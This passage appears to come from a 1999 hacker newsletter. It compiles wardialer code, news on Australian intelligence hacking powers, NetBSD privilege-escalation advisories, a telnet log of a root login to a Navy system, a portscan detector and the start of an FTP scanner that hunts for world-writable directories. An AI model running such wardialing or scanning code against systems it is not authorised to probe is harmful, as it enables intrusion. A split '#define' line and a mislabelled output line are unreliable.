exit(ERROR);
}

/*
* The reason we write "ATH" to a nonconnected host is that
* this is fine. But when it's connected... +++ is sent as
* the login name, and ATH as the password (not a good thing
* to be logged on a remote host anyway. ;)
* If it is connected we will take the less effecient method
* of closing and reopening the fd to hang up
*/


if (connected != 1) {
numbytes = write(fd, "+++\r", 4);
check_for_error(LogFile, fd, numbytes, "write");

usleep(500000);
memset(buf, 0, sizeof(buf));

numbytes = write(fd, "ATH0\r", 5);
check_for_error(LogFile, fd, numbytes, "write");


/*
* We're using SIGALRM, and sleep() uses sig alarm
* and usleep() doesn't.
*/


usleep(1000000);

numbytes = read(fd, buf, sizeof(buf));
check_for_error(LogFile, fd, numbytes, "read");
usleep(2000000);

if (noOK != 1) noOK = checkok(LogFile, fd, buf, "hanging up modem");
else {
/* There was an error getting an "OK" from the modem */
fclose(logfile);
close(fd), exit(ERROR);
}

if (noOK == 1) {
/* There was an error getting an "OK" from the modem */
fclose(logfile);
close(fd), exit(ERROR);
}

} else {
if (close(fd) == ERROR) {
perror("close");
exit(ERROR);
}

open_port();
connected = 0;
}

memset(buf, 0, sizeof(buf));
fclose(logfile);
}

/* -------------------------------------- */

/* The reason I have two different sighandler functions, rather than */
/* just basing off the signal number, is simplicity. */


void sighandler(int signum)
{
FILE *logfile;
char date[32]; /* Where the date for the ending time is stored. */
time_t tm; /* Where calendar time is stored. */

memset(date, 0, sizeof(date));

/* Just exit on one of these signals. */
signal(SIGINT, stopnow);
signal(SIGTERM, stopnow);

tm = time(NULL);
sprintf(date, "%s", ctime(&tm));

if ((logfile = fopen(LogFile, "a")) == NULL) {
perror("fopen");
exit(ERROR);
}

printf("%sReceived signal to quit%s:\nClosing up modem, logging, and exitting.\n",
BOLDRED, NORMAL);
fprintf(logfile, "\nReceived signal to quit. Aborting.\n");
fflush(logfile);

if (conf == 1) {
fprintf(logfile, "Last number dialed was %s", pnum);
close(fd);
fclose(logfile);
exit(ERROR);
}

if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */
if (rand != 1 || conf != 1) {
fprintf(logfile, "Last number dialed was %.3d-%.4d.\n",
First3Digits, ScanMin);

printf("Last number dialed was %s%.3d-%.4d%s.\n",
BOLDCYAN, First3Digits, ScanMin, NORMAL);
}

fprintf(logfile, "Results:\n");
fprintf(logfile, "\t# of successful connects: %d\n", connect);
fprintf(logfile, "\t# of busy numbers: %d\n", busy);
fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse);

} else { /* if LocalOrLong == 'D' */
if (rand != 1 || conf != 1) {
fprintf(logfile, "Last number dialed was 1-%.3d-%.3d-%.4d.\n",
First3Digits, Last3Digits, ScanMin);

printf("Last number dialed was %s1-%.3d-%.3d-%.4d%s.\n",
BOLDCYAN, First3Digits, Last3Digits, ScanMin, NORMAL);
}

fprintf(logfile, "Results:\n");
fprintf(logfile, "\t# of successful connects: %d\n", connect);
fprintf(logfile, "\t# of busy numbers: %d\n", busy);
fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse);

}

/* Print statistics. */
printf("%sResults%s:\n", BOLDRED, NORMAL);

printf("\t# of %ssuccessful connects%s: %s%d%s\n",
BOLDCYAN, NORMAL, PINK, connect, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
YELLOW, NORMAL, PINK, busy, NORMAL);

printf("\t# of %sno responses (timed out)%s: %s%d%s\n",
BOLDGREEN, NORMAL, PINK, noresponse, NORMAL);


fprintf(logfile, "Aborted at: %s", date);
fflush(logfile);

noshow = 1; /* So we don't get 'Opening modem for dialing' because */
/* we use open_port() for both hanging up and dialing. */

hangup();

close(fd);
fclose(logfile);

exit(0);
}

/* -------------------------------------- */

void sighandler1(int signum)
{
signal(SIGALRM, sighandler1);

sig = 1;
response = 0;
connected = 0;
}

/* -------------------------------------- */

void menu(int signum)
{
char ch;

signal(SIGINT, sighandler);
signal(SIGTERM, sighandler);

printf("\n\n1. Hang up modem and skip to next number\n");
printf("2. Hang up modem and exit\n\n");
printf("Enter 1 or 2: ");

while (1) {
fflush(stdout);

ch = getchar();

if (ch == '1') {

alarm(0); /* Stop the timeout timer. */

/* Just act like the number timed out. sighandler1 is */
/* the sig handler called when a number times out. */
sighandler1(0);

/* Reset signal handlers. */
signal(SIGINT, menu);
signal(SIGTERM, menu);

break;
} else if (ch == '2') {
/* Sig handler used to exit. So we will just call this. */
sighandler(0);

} else
if (isprint(ch)) printf("Invalid option.\nEnter 1 or 2: ");
}
}

void stopnow(int signum)
{
/* Exit immediately. */
exit(ERROR);
}


20.0 Australia gears up security for olympics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Australia Proposes Intelligence Service Hacking Powers

CANBERRA, AUSTRALIA, 1999 MAR 25
(Newsbytes) -- By Adam Creed, Newsbytes.
Australia's internal security service ASIO (Australian security intelligence organization)
is set to get increased powers to hack into computers, copy files and alter software on
computers in Australia as it conducts the country's largest ever intelligence operation
in the run up to the Sydney 2000 Olympics.

Federal Attorney-General Daryl Williams Thursday introduced into the House of
Representatives the first amendments to the ASIO Act in 20 years. The amendments, if
passed by Parliament would give the intelligence-gathering service the freedom to
access information on the computers and networks of Australian companies and
individuals.

Williams claimed the amendments were not n response to the security challenges posed
by one event, the Olympics, but through a need to have free access to new sources of
intelligence in the information age.

The ASIO Legislation Amendment Bill 1999 will permit security officers to hack into a
computer if "there are reasonable grounds for believing that access to data held in a
particular computer (the target computer) will substantially assist the collection of
intelligence that is important in relation to security"
.

An access warrant permits ASIO to use computers, phone companies and
telecommunications equipment to to gain access to a remote or networked computer.
Once in, the ASIO hackers will be allowed to copy, add, delete or alter any data in the
target computer that is relevant to the security matter.

When they leave security officers will be allowed to cover up the fact that they hacked
into the system and will not be subject to the Crimes Act which forbids computer hacking
in Australia.

Although Williams asserts the expanded powers are not in preparation for the 2000
Olympics solely, the role of ASIO during the Olympics has been discussed for over a
year.

A 1998 Australian National Audit Office (ANAO) report assessing the adequacy of
planned responsibilities and preparations for security during the Olympic games speaks
of the new challenges faced by ASIO as it draws on new sources of information both
domestically and overseas.

"The Olympics represent a task well beyond the normal scope of intelligence activities,
particularly as it will extend to areas outside the usual focus for Australia's security
interests,"
read the report, describing how organizational structures for Olympic
intelligence operations closely mirrored the arrangements for "coordinating threat
assessments and activities related to terrorism."


During the Olympics ASIO will be expected to collect and disseminate intelligence
information. Interestingly, at the time of the report, the use of the Internet for
intelligence-gathering and monitoring in conjunction with intelligence from overseas
allies (the US and UK) was also discussed.

"Access to open source material, e,g, Internet and media, may also be used to
supplement other material,"
said the report, talking about online monitoring, search
engine use and filters. It went on to note problems with this approach caused by the
huge amount of resources needed and the potential for disinformation.

The Australian Security Intelligence Organisation Legislation Amendment Bill
1999 can be found on the World Wide Web at http://www.aph.gov.au/parlinfo/billsnet/bills.htm
, and the ANAO audit of Olympic security preparations is in PDF format at
http://www.anao.gov.au/rptsfull_99/audrpt5/rpt5-99.pdf
.

Reported By Newsbytes News Network,
http://www.newsbytes.com


@HWA

21.0 NetBSD security advisories: umapfs and noexec mount flag
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NetBSD Security Advisory 1999-006
=================================

Topic: Security hole in umapfs
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990312
Severity: Local users can gain root privileges


Abstract
========

Insufficient kernel checking in the umapfs virtual file system allows
local users to remap their user id to any other user including the root
user.

umapfs is enabled in the default (GENERIC) kernel for the following ports:
amiga, arm32, atari, bebox, i386, mac68k, macppc, newsmips, next68k,
next68k, ofppc, pmax, sparc, sparc64, vax, x68k.

The alpha, hp300, mvme68k, pc532 and sun3 ports do not include umapfs
by default.

Technical Details
=================

umapfs creates a null layer, duplicating a sub-tree of the file system
name space under another part of the global file system, with uid/gid
remapping. The uid and gid mappings are described in two files supplied
by the user to mount_umap(8).

When a umapfs mount is attempted, no additional checks are done in the
kernel other than the usual checks: the user must be root, or have read
access of the target and be owner of the mount point. The only
permission checks made were erroneously placed in the mount_umap(8)
command. A malicious user can compile their own mount_umap binary that
does not include these checks. With this modified mount_umap a user
can mount any directory on another directory they have write access to
with their uid mapped to 0. They will then have be able to create and
modify root owned files in the source directory, including the ability
to create setuid root binaries.


Solution and Workarounds
=========================

A patch is available for the NetBSD 1.3.3 which restricts umapfs mounts
to root and fixes the above problem. You may find this patch on the
NetBSD ftp server:

ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990311-umapfs

NetBSD-current since 19990312 is not vulnerable. Users of NetBSD-current
should upgrade to a source tree later than 19990312.

If neither of the above can be performed, a simple work around is to
remove umapfs from your kernel configuration and rebuild a kernel.
For this you need to remove or comment out the line:

file-system UMAPFS # NULLFS + uid and gid remapping

in the configuration file. See these URL's for documentation building
a NetBSD kernel:

http://www.NetBSD.ORG/Documentation/kernel/index.html#downloading_kernel_source
http://www.NetBSD.ORG/Documentation/kernel/index.html#building_a_kernel

Thanks To
=========

Thanks go to Manuel Bouyer <bouyer@antioche.lip6.fr> for the discovery
and solution for this problem.


Revision History
================
1999/03/17 - initial version


More Information
================

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.


Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.

$NetBSD: NetBSD-SA1999-006.txt,v 1.5 1999/03/17 12:15:13 mrg Exp $


@HWA


21.1 NetBSD noexec mount flag advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-----BEGIN PGP SIGNED MESSAGE-----

NetBSD Security Advisory 1999-007
=================================

Topic: noexec mount flag is not properly handled by non-root mount
Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990318
Severity: Local users can execute binaries they're not allowed to


Abstract
========

On a system where all partitions writable by regular users are mounted with
the `noexec' option, a regular user should not be able to execute a binary
which was not put on the system by the administrator. Insufficient checks
in the mount system call may allow a regular user to mount a device,
remote host or local directory without the `noexec' option, allowing them
to execute arbitrary binaries.


Technical Details
=================

The mount syscall does not require root privileges, it only requires that
the user has read access to the target and is owner of the mount point.
For such mounts, the `nosuid' and `nodev' flags, which disable set-id
executables and device special files respectively, are automatically handled
by the mount system call, but not the `noexec' flag, which disables the
ability to execute binaries on this partition. This allows a regular
user to perform a mount on a mount point he owns, and then execute binaries
from this mount point, even if the mount point was initially in a sub-tree
of the global filesystem mounted with the `noexec' option. The easiest way
to bypass a `noexec' restriction is to use a nullfs mount, but a NFS mount,
or a mount from a readable block device can allow it as well.


Solutions and Workarounds
=========================

A patch is available for the NetBSD 1.3.3 which makes the mount system call
inherit the `noexec' flag from the mount point. You may find this patch on
the NetBSD ftp server:

ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990317-mount

NetBSD-current since 19990318 is not vulnerable. Users of NetBSD-current
should upgrade to a source tree later than 19990318.


Thanks To
=========

Manuel Bouyer <bouyer@antioche.lip6.fr> for the solution.


Revision History
================

1999/03/17 - initial version


More Information
================

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/.


Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved.

$NetBSD: NetBSD-SA1999-007.txt,v 1.1 1999/03/18 07:35:55 mrg Exp $

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAwUBNvCxMz5Ru2/4N2IFAQFWkAQAlHWahlMRPWuribmek9zc/incJeGi8OWj
TxxZY2OPMPluEkmOT30xsGtpNZWKaDUv8g1q6X3KBnYsZFonS5RW/AhClSha5nCL
Kx4GiG/9KNK07a06F0G+WjxOrAXSSvh0UyxLbn6E7VJa7/g8h2Uk3osG5SNMkuvj
qTfmCofhnKI=
=TH30
-----END PGP SIGNATURE-----


@HWA

22.0 Checkpoint releases new DHCP based user 'mapping' technology to track users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN list

Forwarded From: Will Spencer <will.spencer@gte.net>


Check Point Launches Address Mapping Technology


Check Point Software Technologies Ltd. introduced mapping technology
yesterday that automatically matches an end user's identity to a
dynamically assigned IP address.


Check Point says its User to Address Mapping technology will help IT
managers track network use and enforce access policies in Dynamic Host
Control Protocol, where IP addresses change often. A byproduct of Check
Point's 1998 merger with MetaInfo, the technology is available as part of
Check Point's Meta IP software for IP address management.


User to Address Mapping is also integrated with Check Point's Firewall 1
and VPN 1 products. When IT managers use this technology in conjunction
with their firewalls, they can control access: assign granular network
privileges, track excessive Internet usage, and trace unauthorized IP
addresses that cause conflicts that interrupt network service.


User to Address Mapping transparently maps four components -- a user's
logon name, logon time, IP address, and Media Access Control address -- to
a dynamically assigned IP address. An Enterprise Edition of the Meta IP
4.1 product starts at $9,995 for a 1,000-node network. A version for
smaller networks starts at $445 for a 100-node license. -- Amy K. Larsen


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]


@HWA

23.0 SPAWAR a Navy Infosec site ... go FISH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Web Site:

US DEPARTMENT OF DEFENSE WARNING STATEMENT

This is a Department of Defense computer system. This computer system, including all related equipment, networks and
network devices (specifically including Internet access), are provided only for authorized U. S. Government use. DoD
computer systems may be monitored for all lawful purposes, including to ensure that their use is authorized, for
management of the system, to facilitate protection against unauthorized access, and to verify security procedures,
survivability and operational security. Monitoring includes active attacks by authorized DoD entities to test or verify the
security of this system. During monitoring, information may be examined, recorded, copied and used for authorized
purposes. All information, including personal information, placed on or sent over this system may be monitored. Use of this
DoD computer system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use
may subject you to criminal prosecution. Evidence of unauthorized use collected during monitoring may be used for
administrative, criminal or adverse action. Use of this system constitutes consent to monitoring for these purposes.


PRIVACY AND SECURITY NOTICE

This Navy Web Information Service is provided as an official service by the Space and Naval Warfare Systems Command.
For site security and management purposes, all transactions with this server are collected for security and statistical
purposes. This government computer system uses software programs to create summary statistics, which are used for
determining technical design specifications, traffic load, and to identify system performance or problem areas. For site
security purposes and to ensure that this service remains available to all users, this government computer system employs
software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise
cause damage. Except for authorized law enforcement investigations, no other attempts are made to identify individual
users or their usage habits. Raw data logs are used for no other purposes and are scheduled for regular destruction in
accordance with National Archives and Records Administration General Schedule 20. Unauthorized attempts to upload
information or change information on this service are strictly prohibited and may be punishable under the Computer Fraud
and Abuse Act of 1986 and the National Information Infrastructure Protection Act. If you have any questions or comments
about the information presented here, please forward them to the Internet Operations Manager or 1.800.304.4636.


DISCLAIMER

Areas of this Server link to other Web Information Systems providing security-related information which are operated by
other government organizations, commercial firms, educational institutions, and private parties. We have no control over the
Information on those systems which may be objectionable or which may not otherwise conform to Department of Navy
policies. Unless otherwise noted, some of the Sites listed within the pages of this server are provided by organizations
outside the Navy Domain. These links are offered as a convenience and for informational purposes only. Their inclusion here
does not constitute an endorsement or an approval by the Department of the Navy of any of the products, services, or
opinions of the external providers. The Department of the Navy bears no responsibility for the accuracy or the content of
external sites.


Telnet: (real system, simulated intrusion)

$telnet x.x.x.x

Trying x.x.x.x...
Connected to x.x.x.
Escape character is '^]'.

UNIX(r) System V Release 4.0 (droid)

----------------------------------------------------------------------------
| USE OF THIS OR ANY OTHER DEPT. OF DEFENSE INTEREST COMPUTER SYSTEM |
| (DODICS) CONSTITUTES AN EXPRESS CONSENT TO MONITORING AT ALL TIMES. |
| This DODICS and all related equipment are to be used for the communication,|
| transmission, processing, and storage of official U.S. Government or other |
| authorized information only. All DODICS are subject to monitoring at all |
| times. If monitoring of any DODICS reveals possible violation of criminal |
| statutes, all relevant information may be provided to law enforcement |
| officials. |
----------------------------------------------------------------------------


login: root
Password:
login incorrect
login: root
Password:
Last login: Wed Mar 31 15:50:07 from hactivism.net
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

(droid) #1: Thu Dec 24 17:14:45 EST 1998
Updated with: ISS 2.03 October 1998
BEWARE.
stty: No match.
% ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
sas 549 95.5 1.3 1156 836 p0- R Thu04PM 8644:39.03 /usr/local/bin/
sas 13683 2.4 0.5 468 336 p0 Ss 8:15PM 0:00.59 -csh (csh)
root 13682 1.2 1.0 844 596 ?? Ss 8:15PM 0:00.35 telnetd
root 3 0.0 0.0 0 0 ?? DL Thu09AM 0:00.00 (vmdaemon)
root 4 0.0 0.0 0 0 ?? DL Thu09AM 13:06.06 (syncer)
root 29 0.0 0.2 204 88 ?? Is Thu09AM 0:00.01 adjkerntz -i
root 89 0.0 0.8 788 496 ?? Ss Thu02PM 0:41.67 syslogd
daemon 101 0.0 0.7 760 464 ?? Is Thu02PM 0:00.33 portmap
root 125 0.0 0.8 820 500 ?? Ss Thu02PM 0:20.93 inetd
root 128 0.0 0.8 936 492 ?? Ss Thu02PM 0:43.73 cron
root 178 0.0 1.2 1156 768 ?? Ss Thu02PM 0:08.37 sendmail: accep
root 315 0.0 1.7 1276 1044 v0 Is+ Thu02PM 0:07.11 -tcsh (tcsh)
root 317 0.0 0.8 780 476 v2 Is+ Thu02PM 0:00.14 /usr/libexec/ge
root 318 0.0 0.8 780 476 v3 Is+ Thu02PM 0:00.13 /usr/libexec/ge
root 319 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge
root 320 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge
root 371 0.0 1.2 1036 744 ?? Is Thu02PM 0:55.74 SCREEN (screen-
root 1959 0.0 1.6 1400 972 ?? Ss Fri10AM 3:13.06 httpd
root 1965 0.0 1.3 1072 824 ?? Ss Fri10AM 1:41.84 /usr/local/etc/
root 1966 0.0 1.2 1004 732 ?? IN Fri10AM 0:01.79 /usr/local/etc/
root 12504 0.0 0.8 780 516 v1 Is+ 11:45PM 0:00.14 /usr/libexec/ge
nobody 13143 0.0 1.9 1456 1188 ?? I 9:43AM 0:00.97 httpd
nobody 13153 0.0 1.9 1456 1204 ?? I 9:55AM 0:00.82 httpd
nobody 13228 0.0 1.9 1468 1212 ?? I 11:38AM 0:00.66 httpd
nobody 13529 0.0 1.9 1456 1204 ?? I 4:57PM 0:00.23 httpd
root 13576 0.0 1.3 1072 784 ?? I 5:54PM 0:00.02 /usr/local/etc/
root 13645 0.0 1.3 1072 832 ?? I 7:25PM 0:00.02 /usr/local/etc/
root 0 0.0 0.0 0 0 ?? DLs Thu09AM 0:04.13 (swapper)
root 1 0.0 0.4 416 248 ?? Is Thu09AM 0:02.43 /sbin/init --
root 2 0.0 0.0 0 0 ?? DL Thu09AM 0:09.21 (pagedaemon)
% ls -laF /ftp
total 6
drwxr-xr-x 6 root wheel 512 Mar 11 14:15 ./
drwxr-xr-x 14 root wheel 1024 Jan 26 12:28 ../
drwxr-xr-x 2 root wheel 512 Mar 1 15:57 pub/
drwxr-xr-x 3 root wheel 512 Mar 12 12:04 pvt/
drwxrwxrwx 35 root wheel 1024 Mar 31 06:54 secure/
drwxrwxrwx 2 root wheel 512 Mar 11 14:15 warez/
% cd /www
%
logout
Connection closed by foreign host.
$

By the way. a site that is good to look around with lots of legit info is www.nic.mil and
ftp.nic.mil .... network topology to phone numbers for NIPR/SIPRENET can be found on that
system.

Anyway the point of all this is that on this navy site its a good idea to {ahem} go FISH
yeah thats right, http://infosec.nosc.mil/FISH/ has a lot of good information btw fish stands
for Fleet Internet Security Handbook. Cute huh? heh.

<A href="http://infosec.nosc.mil/FISH/">go FISH</a>


@HWA

24.0 Portscan detector
~~~~~~~~~~~~~~~~~

/*
* Scandetd is daemon which tries to recognize port scanning.
* If it happens daemon sends e-mail to specified address (by default
* root@localhost)
* with following informations:
*
* time
* host
* how many connetctions was made
* port of first connection and port of last connection
*
* compile: gcc scandetd.c -o scandetd
*
* author: Michal Suszycki mike@wizard.ae.krakow.pl
*
* You can change few define's and variables below this comment to tune
* scandetd to your needs.
*
* If you have some problems with compiling try to
* change 2 lines:
* #include <netinet/ip.h> to #include <linux/ip.h>
* #include <netinet/tcp.h> to #include <linux/tcp.h>
*
* This code was based on IpLogger Package by Mike Edulla (medulla@infosoc.com)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 1, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
//#include <netinet/ip.h>
#include <linux/ip.h>
//#include <netinet/tcp.h>
#include <linux/tcp.h>
#include <time.h>
#include <signal.h>
#include <string.h>

extern int errno;


/* how many hosts should I remember. If your server is heavily loaded it's
good idea to increase this number a little bit
*/

#define HOW_MANY 6

/* how many connections should I recognize as scanning? */
#define SCAN 25


/* uncomment this if you want to ignore 'scanning' which starts and ends on
80 port. It happens that some host makes a lot
of fast connections only on port 80. Of course we don't want to log it.
*/

#defi

ne NOWWW 


/*
If next connection arrived right after the previous one we have to count it.
Default time is 1 second.
*/

#define SEC 1

/* We use this port for sending mail */
#define MAIL_PORT 25

/* we send mail to <user@host>: */
char *mail_to = "<root@localhost>";

/* IP of the machine which sends our mail */
char *mail_host = "127.0.0.1";

/* mail will be send from host: */
char *from_host = "localhost";


/* ----------- end of user's configuration ---------------- */

#ifndef NOFILE
#define NOFILE 1024
#endif


char *hostlookup(int i)
{
static char buff[128];
struct in_addr p;
p.s_addr = i;
strncpy(buff,inet_ntoa(p),sizeof buff);
return buff;
}

char *servlookup(unsigned short port)
{
struct servent *se;
static char buff[1024];

se=getservbyport(port, "tcp");
if(se == NULL) sprintf(buff, "port %d", ntohs(port));
else sprintf(buff, "%s", se->s_name);
return buff;
}


struct ippkt{
struct iphdr ip;
struct tcphdr tcp;
} pkt;

struct host{
unsigned int from;
time_t t;
unsigned short low_port;
unsigned short hi_port;
int count;
} hosts[HOW_MANY];

void demonize()
{
int fd, f;

if (getppid() != 1){
signal(SIGTTOU,SIG_IGN);
signal(SIGTTIN,SIG_IGN);
signal(SIGTSTP,SIG_IGN);
f = fork();
if (f < 0)
exit(-1);

if (f > 0)
exit (0);

/* child process */
setpgrp();
for (fd = 0 ; fd < NOFILE; fd++) close(fd);
chdir("/");
umask(0);
return;
}
}


void init()
{
int i;
time_t now;
now = time(NULL);
for (i = 0; i < HOW_MANY; i++)
hosts[i].t = now;
}

int allocate(int *p, unsigned int addr)
{
int i, v = 0;
time_t tmp = hosts[0].t;
for( i = 0; i < HOW_MANY; i++){
if (hosts[i].t <= tmp) {
tmp = hosts[i].t;
v = i;
}
if (hosts[i].from == addr){
*p = 1;
return i;
}
}
*p = 0;
return v;
}

void show(int a)
{
int i;

for (i = 0; i < HOW_MANY; i++){
printf("Host %s, time %ld, count=%d, l=%d,",
hostlookup(hosts[i].from),hosts[i].t, hosts[i].count,
ntohs(hosts[i].low_port));
printf("hi = %d\n",ntohs(hosts[i].hi_port));
}
exit (0);
}

void no_zombie(int i)
{
wait(NULL);
}

int send_mail(struct host *bad)
{
static struct sockaddr_in sa;
int s, i, low, high;
char buf[1024], combuf[256];

char *comm[] = { "HELO ", from_host,
"MAIL FROM: SCANDETD@", from_host,
"RCPT TO:" , mail_to,
"DATA" , " "
};

i = fork();
if (!i) return 0;
if (i < 0) return -1;

low = ntohs(bad->low_port);
high = ntohs(bad->hi_port);
sprintf(buf,"%sPossible port scanning from %s,\n"
"I counted %d connections.\nFirst connection was made on %d port and the last one on %d port.\r\n.\r\n",
ctime(&bad->t),hostlookup(bad->from),bad->count, low, high);


sa.sin_port = htons(MAIL_PORT);
sa.sin_family = AF_INET;
if ((sa.sin_addr.s_addr = inet_addr(mail_host)) == -1)
exit (-1);

bzero(&sa.sin_zero, 8);
if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0)
exit (-1);

if (connect(s,(struct sockaddr *) &sa, sizeof (struct sockaddr)) < 0)
exit (-1);

for (i = 0; i < 8 ; i += 2){
sprintf(combuf,"%s%s\n",comm[i],comm[i+1]);
if (write(s,combuf,strlen(combuf)) < 0 ){
close(s);
exit(-1);
}
sleep(1);
}
if (write(s,buf,strlen(buf)) < 0) exit(-1);
sleep(1);
if (write(s,"QUIT\n",5) < 0) exit (-1);

close(s);
exit(0);
}


void main(int argc, char **argv)
{
int s, index, was;
time_t now;

demonize();

init();
s = socket(AF_INET, SOCK_RAW, 6);
// openlog("scand", 0, LOG_LOCAL2);
// syslog(LOG_NOTICE,"scand started and ready");
// signal(SIGINT,show);

/* to avoid zombies */
signal(SIGCHLD,no_zombie);

while(1){
read(s, (struct ippkt*) &pkt, sizeof(pkt));
now = time(NULL);

if (pkt.tcp.syn == 1 && pkt.tcp.ack == 0){

index = allocate(&was,pkt.ip.saddr);

if (!was){
if (hosts[index].count >= SCAN
#ifdef NOWWW
&& hosts[index].low_port != 20480
&& hosts[index].hi_port != 20480
#endif
)
send_mail(&hosts[index]);

hosts[index].from = pkt.ip.saddr;
hosts[index].low_port = pkt.tcp.dest;
hosts[index].hi_port = pkt.tcp.dest;
hosts[index].count = 1;
hosts[index].t = now;
continue;
}

/* if this connection was right after previous we must count it */
else if (now - SEC <= hosts[index].t){
hosts[index].count++;
hosts[index].hi_port = pkt.tcp.dest;

}
hosts[index].t = now;
}
}
}


@HWA


25.0 FTP Vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~


Here is a ftp vulnerability scanner:

-----[ cut here, ftpscan.c ]-----
/*
* ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999
*
* This will open a specific file [-f file], get the IPs from it,
* then, check if FTP port [ -p 21 ] is open and log the version.
* If you specify the [ -o ] flag it will try log into the FTP
* and execute LIST command [recursive], this is usefull
* for see if there are any world writeable directories.
*
* You should know what you can do with that.
*
* credits: localip (lip) routine has been taken from queSO.
*
* Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo
* #rdC - ub
*
*/


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include "blah.h" /* taken from queSO */

char rdcopenfile(char g0d[257]);
void usage(char *damn);
void RDCconnect2(char host[1000], int puerto);
int bindit(int socket_type, u_short port, int *listener);
void sigh(int z);
u_long lip(void); /* QueSO */

FILE *file;
FILE *fileout;

char ipsfile[256],
bleh[100000][200],
homer[256],
beer[256],
huhense[32];

u_long localip;

int sockfd,
leen2=0,
listing=0,
sockfd1,
ip1=0,
ip2=0,
ip3=0,
ip4=0,
lsock=-1,
port2=-1,
lala=0,
dfinder=0,
gotit=0,
xx=0;

int main(int argc, char **argv)
{
char arg;

int p0rt=21;

if ( argc < 3 )
{
usage(argv[0]);
}

while ((arg = getopt(argc, argv, "f:p:o")) != EOF)
{
switch(arg)
{
case 'f':
strncpy(ipsfile,optarg,128);
break;
case 'p':
p0rt = atoi (optarg);
break;
case 'o':
listing = 1;
break;
default:
usage(argv[0]);
break;

}
}
while (dfinder < 5)
{
char disp[500];
sprintf(disp,"ppp%d",dfinder);
strcpy(huhense,disp);
localip = lip();
sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
if ((ip3 && ip4) != 0)
{
gotit=1;
break;
}
dfinder++;
}

dfinder=0;
if (gotit == 1)
dfinder=6;
while (dfinder < 5)
{
char disp[500];
sprintf(disp,"eth%d",dfinder);
strcpy(huhense,disp);
localip = lip();
sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
if ((ip3 && ip4) != 0)
{
gotit=1;
break;
}
dfinder++;
}

if (gotit == 0)
{
fprintf(stdout,"\nCannot define local ip address, aborting!\n\n");
fflush(stdout);
exit(1);
}

fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip));
fflush(stdout);

sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala);
strlen(beer);

rdcopenfile(ipsfile);
for (xx = 0 ; xx < leen2 ; xx++)
{
RDCconnect2(bleh[xx], p0rt);
lala++;
}
}

char rdcopenfile(char g0d[257])
{
int x;

/* see if the file can be read... */
if ((file=fopen(g0d,"r")) == NULL)
{
printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
printf("\nCannot open file %s for reading\n\n", g0d);
exit(1);
}
/* get the all the lines */
for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++);
fclose(file);
}


void RDCconnect2(char host[1000], int puerto)
{
char versi0n[5000];
int nmb;
struct sockaddr_in beb;
struct hostent *d0h;
// struct timeval timev;
beb.sin_family = AF_INET;
beb.sin_port = htons(puerto);
d0h = gethostbyname(host);
if (!d0h)
{
if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
{
printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
printf("\nPut a correct address\n\n");
exit(0);
}
} else
{
bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length);
}

strcpy(homer,"unable to connect: Connection refused");
sockfd = socket(AF_INET, SOCK_STREAM,0);
